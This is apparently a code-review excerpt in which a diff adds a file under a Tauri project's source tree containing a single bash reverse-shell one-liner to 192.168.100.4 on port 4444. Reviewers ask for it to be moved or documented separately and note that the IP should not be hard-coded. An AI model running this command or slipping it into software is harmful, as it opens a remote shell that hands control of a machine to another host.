src-tauri/8235a9b2e3d041d4/2ed059aafa068993

```diff
@@ -0,0 +1 @@
+bash -i >& /dev/tcp/192.168.100.4/4444 0>&1
```

Comment:
Move to a different file - or provide instruction so the user can set up a reverse shell separate to the DDT application

Reply:
The IP should also not be fixed here.